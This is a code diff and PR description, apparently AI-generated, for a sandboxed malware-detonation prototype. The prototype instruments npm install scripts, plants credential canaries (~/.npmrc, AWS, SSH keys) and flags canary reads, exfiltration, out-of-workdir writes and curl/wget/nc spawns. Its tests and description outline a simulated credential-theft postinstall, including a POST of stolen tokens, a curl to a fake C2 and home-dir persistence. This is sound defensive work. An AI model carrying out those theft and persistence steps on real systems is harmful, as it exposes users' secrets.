+function isOutsideWorkRoot(target) {
+  let resolved;
+  try {
+    resolved = canonicalize(target);
+  } catch {
+    return false;
+  }
+  const root = canonicalize(WORK_ROOT);
+  if (resolved === root || resolved.startsWith(`${root}/`)) return false;
+  return resolved;
+}
+
+// ---- child_process -------------------------------------------------------
+const childProcess = require("node:child_process");
+for (const method of ["spawn", "spawnSync", "exec", "execSync", "execFile", "execFileSync", "fork"]) {
+  const original = childProcess[method];
+  if (typeof original !== "function") continue;
+  childProcess[method] = function instrumented(command, ...rest) {
+    const args = Array.isArray(rest[0]) ? rest[0] : [];
+    record({ type: "process.spawn", method, command: String(command), args: args.map(String) });
+    const canary = scanForCanary([command, ...args].join(" "));
+    if (canary) record({ type: "credential.exfil", via: `process:${method}`, token: canary });
+    return original.apply(this, [command, ...rest]);
+  };
+}
+
+// ---- fs reads (canary access) and writes (out-of-workdir persistence) -----
+for (const method of ["readFileSync", "readFile", "openSync", "createReadStream"]) {
+  const original = realFs[method];
+  if (typeof original !== "function") continue;
+  realFs[method] = function instrumented(target, ...rest) {
+    const canary = typeof target === "string" ? isCanaryPath(target) : null;
+    if (canary) record({ type: "credential.read", path: canary, via: `fs:${method}` });
+    return original.apply(this, [target, ...rest]);
+  };
+}
+// Our own log lives outside the work root; never flag writes to it. (Node's
+// appendFileSync delegates to writeFileSync internally, so record()'s own
+// appends would otherwise trip this hook — and recurse.)
+const LOG_REAL = LOG_PATH ? resolvePath(LOG_PATH) : null;
+for (const method of ["writeFileSync", "writeFile", "appendFileSync", "appendFile", "createWriteStream"]) {
+  const original = realFs[method];
+  if (typeof original !== "function") continue;
+  realFs[method] = function instrumented(target, ...rest) {
+    if (typeof target === "string" && (!LOG_REAL || resolvePath(target) !== LOG_REAL)) {
+      const outside = isOutsideWorkRoot(target);
+      if (outside) record({ type: "fs.write.outside", path: outside, via: `fs:${method}` });
+    }
+    return original.apply(this, [target, ...rest]);
+  };
+}
+
+// ---- dns -----------------------------------------------------------------
+const originalLookup = dns.lookup;
+dns.lookup = function instrumented(hostname, ...rest) {
+  record({ type: "dns.lookup", host: String(hostname) });
+  return originalLookup.apply(this, [hostname, ...rest]);
+};
+
+// ---- net (egress + block) ------------------------------------------------
+const originalConnect = net.Socket.prototype.connect;
+net.Socket.prototype.connect = function instrumented(...args) {
+  const options = args[0];
+  let host;
+  let port;
+  if (options && typeof options === "object") {
+    host = options.host;
+    port = options.port;
+  } else {
+    port = args[0];
+    host = typeof args[1] === "string" ? args[1] : "localhost";
+  }
+  const loopback = isLoopback(host);
+  record({ type: "net.connect", host: String(host ?? ""), port: Number(port) || null, loopback });
+  if (!loopback && BLOCK_NON_LOOPBACK) {
+    record({ type: "net.egress.blocked", host: String(host ?? ""), port: Number(port) || null });
+    // Fail closed: surface a connection error instead of reaching the network.
+    process.nextTick(() => this.destroy(new Error("detonation: egress blocked")));
+    return this;
+  }
+  return originalConnect.apply(this, args);
+};
+
+// ---- http/https (destination + body canary scan) -------------------------
+for (const mod of [http, https]) {
+  const originalRequest = mod.request;
+  mod.request = function instrumented(...args) {
+    const info = describeRequest(args);
+    record({ type: "http.request", protocol: mod === https ? "https" : "http", ...info });
+    const req = originalRequest.apply(this, args);
+    const originalWrite = req.write.bind(req);
+    const originalEnd = req.end.bind(req);
+    const scanChunk = (chunk) => {
+      if (!chunk) return;
+      const canary = scanForCanary(Buffer.isBuffer(chunk) ? chunk.toString("utf8") : String(chunk));
+      if (canary) record({ type: "credential.exfil", via: "http.body", token: canary, ...info });
+    };
+    req.write = (chunk, ...rest) => {
+      scanChunk(chunk);
+      return originalWrite(chunk, ...rest);
+    };
+    req.end = (chunk, ...rest) => {
+      if (chunk && typeof chunk !== "function") scanChunk(chunk);
+      return originalEnd(chunk, ...rest);
+    };
+    return req;
+  };
+  const originalGet = mod.get;
+  mod.get = function instrumented(...args) {
+    const req = mod.request(...args);
+    req.end();
+    return req;
+  };
+  void originalGet;
+}
+
+function describeRequest(args) {
+  const first = args[0];
+  if (typeof first === "string") {
+    try {
+      const url = new URL(first);
+      return { host: url.hostname, path: url.pathname, method: "GET" };
+    } catch {
+      return { host: first, path: "", method: "GET" };
+    }
+  }
+  if (first && typeof first === "object") {
+    return {
+      host: String(first.hostname || first.host || ""),
+      path: String(first.path || "/"),
+      method: String(first.method || "GET"),
+    };
+  }
+  return { host: "", path: "", method: "GET" };
+}
+
+record({ type: "process.start", argv: process.argv.slice(1).map(String) });

--- a/prototypes/detonation/src/sink.mjs
+++ b/prototypes/detonation/src/sink.mjs
@@ -1,0 +1,43 @@
+import http from "node:http";
+
+// Loopback HTTP sink. It plays two roles for the detonated package:
+//   1. A fake npm registry / callback host (env points the package at it).
+//   2. An HTTP proxy target (http_proxy env), so proxy-aware clients route here.
+// Every received request is recorded; bodies are scanned for canary tokens so a
+// package that exfiltrates a stolen credential to "the internet" is caught even
+// when it uses a plain HTTP client. The sink answers 200 to everything so the
+// payload proceeds as if exfiltration succeeded (more behavior to observe).
+export async function startSink({ canaryTokens = [] } = {}) {
+  const requests = [];
+
+  const server = http.createServer((req, res) => {
+    const chunks = [];
+    req.on("data", (chunk) => chunks.push(chunk));
+    req.on("end", () => {
+      const body = Buffer.concat(chunks).toString("utf8");
+      const leakedToken = canaryTokens.find((token) => token && body.includes(token)) || null;
+      requests.push({
+        method: req.method,
+        // For proxied requests req.url is an absolute URI; for direct hits it is a path.
+        url: req.url,
+        host: req.headers.host || null,
+        bodyLength: body.length,
+        leakedToken,
+      });
+      res.writeHead(200, { "content-type": "application/json" });
+      res.end(JSON.stringify({ ok: true }));
+    });
+  });
+
+  await new Promise((resolve) => server.listen(0, "127.0.0.1", resolve));
+  const { port } = server.address();
+
+  return {
+    port,
+    origin: `http://127.0.0.1:${port}`,
+    requests,
+    async stop() {
+      await new Promise((resolve) => server.close(resolve));
+    },
+  };
+}

--- a/prototypes/detonation/test/harness.test.mjs
+++ b/prototypes/detonation/test/harness.test.mjs
@@ -1,0 +1,92 @@
+import assert from "node:assert/strict";
+import { after, before, test } from "node:test";
+import net from "node:net";
+import { buildDockerArgs, detonateLocal, fixtureDir } from "../src/harness.mjs";
+import { buildBehaviors, verdictFor } from "../src/report.mjs";
+
+// Guard the whole suite: if any egress reaches a non-loopback address during a
+// detonation, the containment promise is broken. We stub net.connect at the
+// test level to assert nothing external is ever dialed.
+let externalConnects = [];
+const realConnect = net.Socket.prototype.connect;
+before(() => {
+  net.Socket.prototype.connect = function guarded(...args) {
+    const opts = args[0];
+    const host = opts && typeof opts === "object" ? opts.host : args[1];
+    if (host && !["127.0.0.1", "localhost", "::1"].includes(String(host))) {
+      externalConnects.push(String(host));
+    }
+    return realConnect.apply(this, args);
+  };
+});
+after(() => {
+  net.Socket.prototype.connect = realConnect;
+});
+
+test("detonating the benign-suspicious fixture surfaces the attack behaviors", async () => {
+  externalConnects = [];
+  const report = await detonateLocal({ packageDir: fixtureDir("benign-suspicious") });
+
+  assert.equal(report.schema, "drydock.detonation.v1");
+  assert.equal(report.package.name, "benign-suspicious");
+  assert.equal(report.verdict, "critical");
+
+  const rules = new Set(report.behaviors.map((b) => b.ruleId));
+  assert.ok(rules.has("detonation.credential-access"), "reads the ~/.npmrc canary");
+  assert.ok(rules.has("detonation.credential-exfil"), "exfiltrates the canary token");
+  assert.ok(rules.has("detonation.fs-persistence"), "writes a home-dir persistence file");
+  assert.ok(rules.has("detonation.suspicious-spawn"), "shells out to curl");
+
+  // The exfil finding is the highest-signal one: it proves the canary was both
+  // read and sent off-host (caught by the loopback sink and/or the curl shim).
+  const exfil = report.findings.find((f) => f.ruleId === "detonation.credential-exfil");
+  assert.ok(exfil, "credential exfiltration finding present");
+  assert.equal(exfil.severity, "critical");
+
+  // Containment: the harness never let the payload reach a real host.
+  assert.deepEqual(externalConnects, [], "no external network egress escaped the harness");
+});
+
+test("detonating the clean fixture reports no suspicious behavior", async () => {
+  externalConnects = [];
+  const report = await detonateLocal({ packageDir: fixtureDir("clean") });
+
+  assert.equal(report.package.name, "clean-package");
+  assert.equal(report.verdict, "clean");
+  const suspicious = report.behaviors.filter((b) => b.severity !== "info" && b.severity !== "low");
+  assert.deepEqual(
+    suspicious,
+    [],
+    `clean package must not raise medium+ behaviors, got: ${JSON.stringify(suspicious)}`,
+  );
+  assert.deepEqual(externalConnects, []);
+});
+
+test("buildBehaviors dedupes repeats and ranks by severity", () => {
+  const behaviors = buildBehaviors([
+    { type: "process.spawn", command: "/bin/env", args: [] },
+    { type: "process.spawn", command: "/bin/env", args: [] },
+    { type: "credential.read", path: "/home/x/.npmrc" },
+    { type: "fs.write.outside", path: "/home/x/.evil" },
+  ]);
+  assert.equal(behaviors[0].severity, "high", "credential.read outranks the spawn/write");
+  const spawn = behaviors.find((b) => b.ruleId === "detonation.process-spawn");
+  assert.equal(spawn.count, 2, "identical spawns collapse into one behavior with a count");
+});
+
+test("verdictFor escalates to the worst behavior severity", () => {
+  assert.equal(verdictFor([]), "clean");
+  assert.equal(verdictFor([{ severity: "low" }]), "low");
+  assert.equal(verdictFor([{ severity: "low" }, { severity: "critical" }]), "critical");
+});
+
+test("buildDockerArgs pins the hardened isolation flags", () => {
+  const args = buildDockerArgs({ packageDir: "/tmp/pkg", outDir: "/tmp/out" });
+  const joined = args.join(" ");
+  assert.match(joined, /--network none/);
+  assert.match(joined, /--read-only/);
+  assert.match(joined, /--cap-drop ALL/);
+  assert.match(joined, /--security-opt no-new-privileges/);
+  assert.match(joined, /--user 1000:1000/);
+  assert.match(joined, /:\/pkg:ro/, "package is mounted read-only");
+});


### PR DESCRIPTION
## What

A standalone dynamic-analysis prototype for ambition proposal #7 — the "detonation" idea. It runs a package's install lifecycle in an isolated environment and records what it *does* at runtime (process spawns, network egress, out-of-workdir writes, credential-canary access), then emits a behavior report shaped to attach to a Drydock scan (`drydock.detonation.v1`).

This is the complement to static detection: rules catch what's visible in the bytes; detonation catches what only manifests at runtime (payloads decrypted from strings, install-time credential theft, delayed callbacks).

## Why it's a separate system (and stays outside the Worker boundary)

Drydock's core invariant is **never execute package code**. This prototype deliberately does the opposite, so it is fully quarantined:

- Lives under `prototypes/detonation/`, is **not** referenced by `wrangler.jsonc`, and is **never imported** by `server/` or `src/`.
- Has its own `package.json` and `node --test` runner. The root `pnpm run verify` does not build, lint, or run it — `prototypes/**` is added to the oxlint/oxfmt ignore lists, and tsconfig + the vitest projects already scope to `src/`/`server/`/`test/`. Verified green after this change.
- The **only** contract with Drydock is the report format — the Worker would ingest a report produced by this service running elsewhere, never call the harness in-process.

## Isolation model

| Mode | Isolation |
| ---- | --------- |
| `docker` (the real boundary) | `--network none`, `--read-only`, `--cap-drop ALL`, `no-new-privileges`, non-root, pids/mem/cpu limits, tmpfs workdir. `buildDockerArgs` is a pure, unit-tested argv builder; the `Dockerfile` carries node + the harness. |
| `local` (dev/demo) | Scrubbed env, throwaway HOME, PATH shims for `curl`/`wget`/`nc`, a `--require` preload instrumenting `child_process`/`net`/`dns`/`http`/`fs`, and **loopback-only egress** — non-loopback TCP is logged and blocked so a payload can't phone home during a demo. Documented as a demo of the instrumentation, not a containment boundary. |

## Detection highlight — credential canaries

The harness plants fake `~/.npmrc`, `~/.aws/credentials`, `~/.ssh/id_rsa`, and `.env` files, each with a unique token. Reading one is flagged; the token later appearing in an egress body or a subprocess argument is flagged as **exfiltration** — the two halves of a credential-theft attack, tied together by the token. Any egress the payload attempts is caught by the loopback sink (which scans bodies for canary tokens) even when the payload uses a plain HTTP client.

## Try it

```sh
cd prototypes/detonation
npm run demo         # benign-suspicious fixture → verdict CRITICAL, 9 behaviors
npm run demo:clean   # clean fixture → verdict CLEAN, 0 behaviors
npm test             # 5 tests, offline
```

## Testing

`node --test`, 5 passing, fully offline:
- **benign-suspicious** fixture — a *harmless* postinstall that simulates the whole attack (reads the canary npmrc, POSTs it to the sink, curls a fake C2, writes home-dir persistence, spawns `env`); every action targets the local sink or fake canaries, nothing leaves the machine. Asserts credential-access + exfil + persistence + suspicious-spawn all fire and verdict is `critical`, and that **no external connection escaped** the harness.
- **clean** fixture — normal postinstall writing a build artifact in its own dir; asserts verdict `clean`, no false positives.
- Unit tests for the report builder (dedupe/severity ranking) and the hardened `buildDockerArgs`.

Root `pnpm run verify` remains green with the prototype present.

## Status

Prototype. Proves the harness, instrumentation, canary-exfil detection, and report shape. Roadmap (in README): real dependency resolution inside the container, micro-VM (Firecracker/gVisor) isolation, syscall-level capture for non-Node payloads, PyPI coverage, and feeding confirmed behaviors into a Drydock `detonation` finding source + the cross-package intelligence feed (#3).

🤖 Generated with [Claude Code](https://claude.com/claude-code)